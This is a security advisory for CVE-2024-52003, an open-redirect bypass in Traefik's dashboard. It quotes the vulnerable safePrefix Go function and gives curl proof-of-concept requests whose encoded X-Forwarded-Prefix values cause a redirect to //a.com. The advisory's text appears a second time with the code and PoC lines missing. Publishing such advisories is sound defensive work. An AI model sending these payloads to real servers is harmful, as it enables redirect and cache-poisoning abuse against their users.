Impact
There is a vulnerability in Traefik that allows the client to provide the X-Forwarded-Prefix
header from an untrusted source.
Patches
Workarounds
No workaround.
For more information
If you have any questions or comments about this advisory, please open an issue.
Original Description
### Summary
The previously reported open redirect ([GHSA-6qq8-5wq3-86rp](https://github.com/traefik/traefik/security/advisories/GHSA-6qq8-5wq3-86rp)) is not fixed correctly. The safePrefix function can be tricked to return an absolute URL.
Details
The Traefik API dashboard component tries to validate that the value of the header X-Forwarded-Prefix is a site relative path:
http.Redirect(resp, req, safePrefix(req)+"/dashboard/", http.StatusFound)
func safePrefix(req *http.Request) string {
prefix := req.Header.Get("X-Forwarded-Prefix")
if prefix == "" {
return ""
}
parse, err := url.Parse(prefix)
if err != nil {
return ""
}
return parse.Path
}
PoC
An attacker can bypass this by sending the following payload:
curl -v 'http://traefik.localhost' -H 'X-Forwarded-Prefix: %0d//a.com'
[...]
> HTTP/1.1 302 Found
> Location: //a.com/dashboard/
or similar:
curl -v 'http://traefik.localhost' -H 'X-Forwarded-Prefix: %2f%2fa.com'
[...]
> HTTP/1.1 302 Found
> Location: //a.com/dashboard/
Impact
Similar to the previously reported bug. In cache poisoning scenarios this may be exploitable.
### References
- https://github.com/traefik/traefik/security/advisories/
GHSA-h924-8g65-j9wg
- https://nvd.nist.gov/vuln/detail/
CVE-2024-52003
- https://github.com/
traefik/traefik/pull/11253
- https://github.com/traefik/traefik/releases/tag/v2.11.14
- https://github.com/traefik/traefik/releases/tag/v3.2.1
Impact
There is a vulnerability in Traefik that allows the client to provide the
X-Forwarded-Prefix
header from an untrusted source.Patches
Workarounds
No workaround.
For more information
If you have any questions or comments about this advisory, please open an issue.
Original Description
### Summary The previously reported open redirect ([GHSA-6qq8-5wq3-86rp](https://github.com/traefik/traefik/security/advisories/GHSA-6qq8-5wq3-86rp)) is not fixed correctly. The safePrefix function can be tricked to return an absolute URL.Details
The Traefik API dashboard component tries to validate that the value of the header X-Forwarded-Prefix is a site relative path:
PoC
An attacker can bypass this by sending the following payload:
or similar:
Impact
Similar to the previously reported bug. In cache poisoning scenarios this may be exploitable.